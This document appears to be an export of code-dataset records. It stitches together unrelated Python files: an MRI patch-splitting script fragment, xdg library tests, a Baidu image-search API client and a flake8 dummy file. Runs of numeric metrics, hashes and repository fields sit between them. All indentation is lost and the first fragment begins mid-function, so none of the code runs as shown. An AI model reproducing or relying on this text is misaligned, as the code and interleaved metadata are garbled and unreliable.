folder = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1])
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
Path = resultFolder + 'normal/AllData_Move_05_label05_val_ab' + str(patchSize[0]) + str(patchSize[1]) +'.h5'
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
hf.create_dataset('test_index', data=num_ind_test)
hf.create_dataset('train_index', data=num_ind_train)
hf.create_dataset('proband_list', data=proband_list)
hf.create_dataset('model_list', data=model_list)
elif sSplitting == "crossvalidation_data":
kf = KFold(n_splits = 15)
ind_split = 0
for train_index, test_index in kf.split(allPatches):
# print("TRAIN:", train_index, "TEST:", test_index)
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
folder = resultFolder + 'crossvalidation_data/' + str(patchSize[0]) + str(patchSize[1])
Path = resultFolder + 'crossvalidation_data/' + str(patchSize[0]) + str(patchSize[1]) + '/crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
os.makedirs(folder)
ind_split += 1
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
hf.create_dataset('test_index', data=test_index)
hf.create_dataset('train_index', data=train_index)
hf.create_dataset('proband_list', data=proband_list)
hf.create_dataset('model_list', data=model_list)
elif sSplitting == "crossvalidation_patient":
kf = KFold(n_splits=15)
ind_split = 0
for train_index, test_index in kf.split(allPatches):
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
folder = resultFolder + 'crossvalidation_patient/' + str(patchSize[0]) + str(patchSize[1])
Path = resultFolder + 'crossvalidation_patient/' + str(patchSize[0]) + str(patchSize[1]) + '/crossVal_data' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
os.makedirs(folder)
ind_split += 1
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
hf.create_dataset('proband_list', data=proband_list)
hf.create_dataset('model_list', data=model_list)
def fSplitDataset3D(resultFolder, proband_list, model_list, allPatches, allY, sSplitting, patchSize, patchOverlap, split_ratio):
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1]:
allPatches = np.transpose(allPatches, (3, 0, 1, 2))
if sSplitting == "normal_rand":
nPatches = allPatches.shape[0]
dVal = math.floor(split_ratio * nPatches)
rand_num = np.random.permutation(np.arange(nPatches))
rand_num_test = rand_num[0:int(dVal)].astype(int)
rand_num_train = rand_num[int(dVal):nPatches].astype(int)
X_test = allPatches[rand_num_test, :, :, :]
y_test = allY[rand_num_test]
X_train = allPatches
X_train = np.delete(X_train, rand_num_test, axis=0)
y_train = allY
y_train = np.delete(y_train, rand_num_test)
folder = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1])
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
Path = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1]) + '/normal_data' + str(patchSize[0]) + str(patchSize[1]) +'.h5'
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
hf.create_dataset('rand_num_test', data=rand_num_test)
hf.create_dataset('rand_num_train', data=rand_num_train)
hf.create_dataset('proband_list', data=proband_list)
hf.create_dataset('model_list', data=model_list)
elif sSplitting == "normal":
nPatches = allPatches.shape[0]
print(allPatches.shape)
dVal = 1980#math.floor(split_ratio * nPatches)
num_ind = np.arange(nPatches)
num_ind_test = num_ind[0:dVal].astype(int)
num_ind_train = num_ind[int(dVal):nPatches].astype(int)
X_test = allPatches[num_ind_test, :, :, :]
y_test = allY[num_ind_test]
X_train = allPatches
X_train = np.delete(X_train, num_ind_test, axis=0)
y_train = allY
y_train = np.delete(y_train, num_ind_test)
folder = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1])
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
Path = resultFolder + 'normal_3D/Beckent2_Move_05_label05_val_ab_test_ma_' + str(patchSize[0]) + str(patchSize[1]) +'3D.h5'
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
hf.create_dataset('test_index', data=num_ind_test)
hf.create_dataset('train_index', data=num_ind_train)
hf.create_dataset('proband_list', data=proband_list)
hf.create_dataset('model_list', data=model_list)
elif sSplitting == "crossvalidation_data":
kf = KFold(n_splits = 15)
ind_split = 0
for train_index, test_index in kf.split(allPatches):
print("TRAIN:", train_index, "TEST:", test_index)
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
folder = resultFolder + 'crossvalidation_data/' + str(patchSize[0]) + str(patchSize[1])
Path = resultFolder + 'crossvalidation_data/' + str(patchSize[0]) + str(patchSize[1]) + '/crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
ind_split += 1
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
hf.create_dataset('proband_list', data=proband_list)
hf.create_dataset('model_list', data=model_list)
elif sSplitting == "crossvalidation_patient":
kf = KFold(n_splits=15)
ind_split = 0
for train_index, test_index in kf.split(allPatches):
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
folder = resultFolder + 'crossvalidation_patient/' + str(patchSize[0]) + str(patchSize[1])
Path = resultFolder + 'crossvalidation_patient/' + str(patchSize[0]) + str(patchSize[1]) + '/crossVal_data' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
os.makedirs(folder)
ind_split += 1
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
hf.create_dataset('proband_list', data=proband_list)
hf.create_dataset('model_list', data=model_list)
| 49.644531
| 188
| 0.604217
| 1,593
| 12,709
| 4.558067
| 0.065286
| 0.081531
| 0.152872
| 0.048478
| 0.965983
| 0.958683
| 0.951109
| 0.942019
| 0.942019
| 0.942019
| 0
| 0.015166
| 0.273664
| 12,709
| 256
| 189
| 49.644531
| 0.771422
| 0.015894
| 0
| 0.875556
| 0
| 0
| 0.100474
| 0.027283
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008889
| false
| 0.022222
| 0.022222
| 0
| 0.031111
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50bb0804cb24987ebc55bfdb44634e0d62165982
| 7,784
|
py
|
Python
|
test/test_xdg.py
|
rondou/xdg
|
d94dad50535de861e6987bf918be08f96317d2d7
|
[
"0BSD"
] | 70
|
2017-03-29T05:26:05.000Z
|
2022-02-04T22:22:42.000Z
|
test/test_xdg.py
|
rondou/xdg
|
d94dad50535de861e6987bf918be08f96317d2d7
|
[
"0BSD"
] | 65
|
2017-03-29T17:05:23.000Z
|
2022-03-01T23:04:56.000Z
|
test/test_xdg.py
|
rondou/xdg
|
d94dad50535de861e6987bf918be08f96317d2d7
|
[
"0BSD"
] | 12
|
2017-06-23T16:15:11.000Z
|
2021-07-20T11:56:00.000Z
|
"""Test suite for xdg."""
import os
from pathlib import Path
from _pytest.monkeypatch import MonkeyPatch
import xdg
HOME_DIR = Path("/homedir")
def test_xdg_cache_home_unset(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_cache_home when XDG_CACHE_HOME is unset."""
monkeypatch.delenv("XDG_CACHE_HOME", raising=False)
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
assert xdg.xdg_cache_home() == HOME_DIR / ".cache"
def test_xdg_cache_home_empty(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_cache_home when XDG_CACHE_HOME is empty."""
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
monkeypatch.setenv("XDG_CACHE_HOME", "")
assert xdg.xdg_cache_home() == HOME_DIR / ".cache"
def test_xdg_cache_home_relative(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_cache_home when XDG_CACHE_HOME is relative path."""
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
monkeypatch.setenv("XDG_CACHE_HOME", "rela/tive")
assert xdg.xdg_cache_home() == HOME_DIR / ".cache"
def test_xdg_cache_home_absolute(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_cache_home when XDG_CACHE_HOME is absolute path."""
monkeypatch.setenv("XDG_CACHE_HOME", "/xdg_cache_home")
assert xdg.xdg_cache_home() == Path("/xdg_cache_home")
def test_xdg_config_dirs_unset(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_config_dirs when XDG_CONFIG_DIRS is unset."""
monkeypatch.delenv("XDG_CONFIG_DIRS", raising=False)
assert xdg.xdg_config_dirs() == [Path("/etc/xdg")]
def test_xdg_config_dirs_empty(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_config_dirs when XDG_CONFIG_DIRS is empty."""
monkeypatch.setenv("XDG_CONFIG_DIRS", "")
assert xdg.xdg_config_dirs() == [Path("/etc/xdg")]
def test_xdg_config_dirs_relative(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_config_dirs when XDG_CONFIG_DIRS is relative paths."""
monkeypatch.setenv("XDG_CONFIG_DIRS", "rela/tive:ano/ther")
assert xdg.xdg_config_dirs() == [Path("/etc/xdg")]
def test_xdg_config_dirs_set(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_config_dirs when XDG_CONFIG_DIRS is set."""
monkeypatch.setenv("XDG_CONFIG_DIRS", "/first:rela/tive:/sec/ond")
assert xdg.xdg_config_dirs() == [Path("/first"), Path("/sec/ond")]
def test_xdg_config_home_unset(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_config_home when XDG_CONFIG_HOME is unset."""
monkeypatch.delenv("XDG_CONFIG_HOME", raising=False)
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
assert xdg.xdg_config_home() == HOME_DIR / ".config"
def test_xdg_config_home_empty(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_config_home when XDG_CONFIG_HOME is empty."""
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
monkeypatch.setenv("XDG_CONFIG_HOME", "")
assert xdg.xdg_config_home() == HOME_DIR / ".config"
def test_xdg_config_home_relative(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_config_home when XDG_CONFIG_HOME is relative path."""
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
monkeypatch.setenv("XDG_CONFIG_HOME", "rela/tive")
assert xdg.xdg_config_home() == HOME_DIR / ".config"
def test_xdg_config_home_absolute(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_config_home when XDG_CONFIG_HOME is absolute path."""
monkeypatch.setenv("XDG_CONFIG_HOME", "/xdg_config_home")
assert xdg.xdg_config_home() == Path("/xdg_config_home")
def test_xdg_data_dirs_unset(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_data_dirs when XDG_DATA_DIRS is unset."""
monkeypatch.delenv("XDG_DATA_DIRS", raising=False)
assert xdg.xdg_data_dirs() == [
Path("/usr/local/share/"),
Path("/usr/share/"),
]
def test_xdg_data_dirs_empty(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_data_dirs when XDG_DATA_DIRS is empty."""
monkeypatch.setenv("XDG_DATA_DIRS", "")
assert xdg.xdg_data_dirs() == [
Path("/usr/local/share/"),
Path("/usr/share/"),
]
def test_xdg_data_dirs_relative(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_data_dirs when XDG_DATA_DIRS is relative paths."""
monkeypatch.setenv("XDG_DATA_DIRS", "rela/tive:ano/ther")
assert xdg.xdg_data_dirs() == [
Path("/usr/local/share/"),
Path("/usr/share/"),
]
def test_xdg_data_dirs_set(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_data_dirs when XDG_DATA_DIRS is set."""
monkeypatch.setenv("XDG_DATA_DIRS", "/first/:rela/tive:/sec/ond/")
assert xdg.xdg_data_dirs() == [Path("/first/"), Path("/sec/ond/")]
def test_xdg_data_home_unset(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_data_home when XDG_DATA_HOME is unset."""
monkeypatch.delenv("XDG_DATA_HOME", raising=False)
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
assert xdg.xdg_data_home() == HOME_DIR / ".local" / "share"
def test_xdg_data_home_empty(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_data_home when XDG_DATA_HOME is empty."""
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
monkeypatch.setenv("XDG_DATA_HOME", "")
assert xdg.xdg_data_home() == HOME_DIR / ".local" / "share"
def test_xdg_data_home_relative(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_data_home when XDG_DATA_HOME is relative path."""
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
monkeypatch.setenv("XDG_DATA_HOME", "rela/tive")
assert xdg.xdg_data_home() == HOME_DIR / ".local" / "share"
def test_xdg_data_home_absolute(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_data_home when XDG_DATA_HOME is absolute path."""
monkeypatch.setenv("XDG_DATA_HOME", "/xdg_data_home")
assert xdg.xdg_data_home() == Path("/xdg_data_home")
def test_xdg_runtime_dir_unset(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_runtime_dir when XDG_RUNTIME_DIR is unset."""
monkeypatch.delenv("XDG_RUNTIME_DIR", raising=False)
assert xdg.xdg_runtime_dir() is None
def test_xdg_runtime_dir_empty(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_runtime_dir when XDG_RUNTIME_DIR is empty."""
monkeypatch.setenv("XDG_RUNTIME_DIR", "")
assert xdg.xdg_runtime_dir() is None
def test_xdg_runtime_dir_relative(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_runtime_dir when XDG_RUNTIME_DIR is relative path."""
monkeypatch.setenv("XDG_RUNTIME_DIR", "rela/tive")
assert xdg.xdg_runtime_dir() is None
def test_xdg_runtime_dir_absolute(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_runtime_dir when XDG_RUNTIME_DIR is absolute path."""
monkeypatch.setenv("XDG_RUNTIME_DIR", "/xdg_runtime_dir")
assert xdg.xdg_runtime_dir() == Path("/xdg_runtime_dir")
def test_xdg_state_home_unset(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_state_home when XDG_STATE_HOME is unset."""
monkeypatch.delenv("XDG_STATE_HOME", raising=False)
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
assert xdg.xdg_state_home() == HOME_DIR / ".local" / "state"
def test_xdg_state_home_empty(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_state_home when XDG_STATE_HOME is empty."""
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
monkeypatch.setenv("XDG_STATE_HOME", "")
assert xdg.xdg_state_home() == HOME_DIR / ".local" / "state"
def test_xdg_state_home_relative(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_state_home when XDG_STATE_HOME is relative path."""
monkeypatch.setenv("HOME", os.fspath(HOME_DIR))
monkeypatch.setenv("XDG_STATE_HOME", "rela/tive")
assert xdg.xdg_state_home() == HOME_DIR / ".local" / "state"
def test_xdg_state_home_absolute(monkeypatch: MonkeyPatch) -> None:
"""Test xdg_state_home when XDG_STATE_HOME is absolute path."""
monkeypatch.setenv("XDG_STATE_HOME", "/xdg_state_home")
assert xdg.xdg_state_home() == Path("/xdg_state_home")
| 38.92
| 70
| 0.723664
| 1,094
| 7,784
| 4.799817
| 0.042962
| 0.074652
| 0.053323
| 0.15997
| 0.960008
| 0.914492
| 0.830318
| 0.760998
| 0.719482
| 0.693582
| 0
| 0
| 0.139003
| 7,784
| 199
| 71
| 39.115578
| 0.783497
| 0.195401
| 0
| 0.354545
| 0
| 0
| 0.160209
| 0.008501
| 0
| 0
| 0
| 0
| 0.254545
| 1
| 0.254545
| false
| 0
| 0.036364
| 0
| 0.290909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50f0d0366d7ca48c096063219deb1f4c78c2f05c
| 13,578
|
py
|
Python
|
build/lib/aip/imagesearch.py
|
electricats/hakDProject
|
7633f71feb14c756e8213f7243b5a531a51fcbe6
|
[
"Apache-2.0"
] | 1
|
2021-08-17T11:19:08.000Z
|
2021-08-17T11:19:08.000Z
|
build/lib/aip/imagesearch.py
|
electricats/hakDProject
|
7633f71feb14c756e8213f7243b5a531a51fcbe6
|
[
"Apache-2.0"
] | null | null | null |
build/lib/aip/imagesearch.py
|
electricats/hakDProject
|
7633f71feb14c756e8213f7243b5a531a51fcbe6
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
图像搜索
"""
import re
import sys
import math
import time
from .base import AipBase
from .base import base64
from .base import json
from .base import urlencode
from .base import quote
class AipImageSearch(AipBase):
"""
图像搜索
"""
__sameHqAddUrl = 'https://aip.baidubce.com/rest/2.0/realtime_search/same_hq/add'
__sameHqSearchUrl = 'https://aip.baidubce.com/rest/2.0/realtime_search/same_hq/search'
__sameHqUpdateUrl = 'https://aip.baidubce.com/rest/2.0/realtime_search/same_hq/update'
__sameHqDeleteUrl = 'https://aip.baidubce.com/rest/2.0/realtime_search/same_hq/delete'
__similarAddUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/similar/add'
__similarSearchUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/similar/search'
__similarUpdateUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/similar/update'
__similarDeleteUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/similar/delete'
__productAddUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/product/add'
__productSearchUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/product/search'
__productUpdateUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/product/update'
__productDeleteUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/product/delete'
__picturebookAdd = "https://aip.baidubce.com/rest/2.0/imagesearch/v1/realtime_search/picturebook/add"
__picturebookSearch = "https://aip.baidubce.com/rest/2.0/imagesearch/v1/realtime_search/picturebook/search"
__picturebookDelete = "https://aip.baidubce.com/rest/2.0/imagesearch/v1/realtime_search/picturebook/delete"
__picturebookUpdate = "https://aip.baidubce.com/rest/2.0/imagesearch/v1/realtime_search/picturebook/update"
def sameHqAdd(self, image, brief, options=None):
"""
相同图检索—入库
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data['brief'] = brief
data.update(options)
return self._request(self.__sameHqAddUrl, data)
def sameHqAddUrl(self, url, brief, options=None):
"""
相同图检索—入库
"""
options = options or {}
data = {}
data['url'] = url
data['brief'] = brief
data.update(options)
return self._request(self.__sameHqAddUrl, data)
def sameHqSearch(self, image, options=None):
"""
相同图检索—检索
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__sameHqSearchUrl, data)
def sameHqSearchUrl(self, url, options=None):
"""
相同图检索—检索
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__sameHqSearchUrl, data)
def sameHqUpdate(self, image, options=None):
"""
相同图检索—更新
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__sameHqUpdateUrl, data)
def sameHqUpdateUrl(self, url, options=None):
"""
相同图检索—更新
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__sameHqUpdateUrl, data)
def sameHqUpdateContSign(self, cont_sign, options=None):
"""
相同图检索—更新
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__sameHqUpdateUrl, data)
def sameHqDeleteByImage(self, image, options=None):
"""
相同图检索—删除
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__sameHqDeleteUrl, data)
def sameHqDeleteByUrl(self, url, options=None):
"""
相同图检索—删除
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__sameHqDeleteUrl, data)
def sameHqDeleteBySign(self, cont_sign, options=None):
"""
相同图检索—删除
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__sameHqDeleteUrl, data)
def similarAdd(self, image, brief, options=None):
"""
相似图检索—入库
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data['brief'] = brief
data.update(options)
return self._request(self.__similarAddUrl, data)
def similarAddUrl(self, url, brief, options=None):
"""
相似图检索—入库
"""
options = options or {}
data = {}
data['url'] = url
data['brief'] = brief
data.update(options)
return self._request(self.__similarAddUrl, data)
def similarSearch(self, image, options=None):
"""
相似图检索—检索
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__similarSearchUrl, data)
def similarSearchUrl(self, url, options=None):
"""
相似图检索—检索
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__similarSearchUrl, data)
def similarUpdate(self, image, options=None):
"""
相似图检索—更新
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__similarUpdateUrl, data)
def similarUpdateUrl(self, url, options=None):
"""
相似图检索—更新
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__similarUpdateUrl, data)
def similarUpdateContSign(self, cont_sign, options=None):
"""
相似图检索—更新
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__similarUpdateUrl, data)
def similarDeleteByImage(self, image, options=None):
"""
相似图检索—删除
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__similarDeleteUrl, data)
def similarDeleteByUrl(self, url, options=None):
"""
相似图检索—删除
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__similarDeleteUrl, data)
def similarDeleteBySign(self, cont_sign, options=None):
"""
相似图检索—删除
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__similarDeleteUrl, data)
def productAdd(self, image, brief, options=None):
"""
商品检索—入库
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data['brief'] = brief
data.update(options)
return self._request(self.__productAddUrl, data)
def productAddUrl(self, url, brief, options=None):
"""
商品检索—入库
"""
options = options or {}
data = {}
data['url'] = url
data['brief'] = brief
data.update(options)
return self._request(self.__productAddUrl, data)
def productSearch(self, image, options=None):
"""
商品检索—检索
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__productSearchUrl, data)
def productSearchUrl(self, url, options=None):
"""
商品检索—检索
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__productSearchUrl, data)
def productUpdate(self, image, options=None):
"""
商品检索—更新
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__productUpdateUrl, data)
def productUpdateUrl(self, url, options=None):
"""
商品检索—更新
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__productUpdateUrl, data)
def productUpdateContSign(self, cont_sign, options=None):
"""
商品检索—更新
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__productUpdateUrl, data)
def productDeleteByImage(self, image, options=None):
"""
商品检索—删除
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__productDeleteUrl, data)
def productDeleteByUrl(self, url, options=None):
"""
商品检索—删除
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__productDeleteUrl, data)
def productDeleteBySign(self, cont_sign, options=None):
"""
商品检索—删除
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__productDeleteUrl, data)
def pictureBookAddImage(self, image, brief, options=None):
"""
绘本图片搜索—入库-image
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data['brief'] = brief
data.update(options)
return self._request(self.__picturebookAdd, data)
def pictureBookAddUrl(self, url, brief, options=None):
"""
绘本图片搜索—入库-url
"""
options = options or {}
data = {}
data['url'] = url
data['brief'] = brief
data.update(options)
return self._request(self.__picturebookAdd, data)
def pictureBookSearchImage(self, image, options=None):
"""
绘本图片搜索—检索-image
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__picturebookSearch, data)
def pictureBookSearchUrl(self, url, options=None):
"""
绘本图片搜索—检索-url
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__picturebookSearch, data)
def pictureBookUpdate(self, image, options=None):
"""
绘本图片搜索—更新-image
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__picturebookUpdate, data)
def pictureBookUpdateUrl(self, url, options=None):
"""
绘本图片搜索—更新-url
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__picturebookUpdate, data)
def pictureBookUpdateContSign(self, cont_sign, options=None):
"""
绘本图片搜索—更新-cont_sign
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__picturebookUpdate, data)
def pictureBookDeleteByImage(self, image, options=None):
"""
绘本图片搜索—删除-image
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__picturebookDelete, data)
def pictureBookDeleteByUrl(self, url, options=None):
"""
绘本图片搜索—删除-url
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__picturebookDelete, data)
def pictureBookDeleteBySign(self, cont_sign, options=None):
"""
绘本图片搜索—删除-cont_sign
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__picturebookDelete, data)
| 23.90493
| 111
| 0.565032
| 1,380
| 13,578
| 5.444928
| 0.078261
| 0.058557
| 0.085174
| 0.106468
| 0.841762
| 0.831115
| 0.784536
| 0.766968
| 0.766968
| 0.763774
| 0
| 0.01182
| 0.308366
| 13,578
| 567
| 112
| 23.94709
| 0.784049
| 0.033289
| 0
| 0.759124
| 0
| 0.043796
| 0.122463
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.145985
| false
| 0
| 0.032847
| 0
| 0.386861
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f9ec6b8f5ad6372a75ecb059b4e64ff8d44643d
| 382
|
py
|
Python
|
tests/dummy/conditional_block.py
|
thewchan/flake8-multiline-containers
|
921f48eec5ad4b6b12c150d2c0c1d6fd412539b8
|
[
"MIT"
] | 10
|
2019-06-03T22:48:13.000Z
|
2021-06-14T09:01:42.000Z
|
tests/dummy/conditional_block.py
|
thewchan/flake8-multiline-containers
|
921f48eec5ad4b6b12c150d2c0c1d6fd412539b8
|
[
"MIT"
] | 22
|
2019-07-10T18:49:58.000Z
|
2022-03-18T12:58:32.000Z
|
tests/dummy/conditional_block.py
|
thewchan/flake8-multiline-containers
|
921f48eec5ad4b6b12c150d2c0c1d6fd412539b8
|
[
"MIT"
] | 3
|
2019-10-12T20:01:24.000Z
|
2021-11-06T20:38:48.000Z
|
# One line
if (False or True):
pass
elif (False or True):
pass
# Multiple lines
if (False
or True):
pass
elif (False
or True):
pass
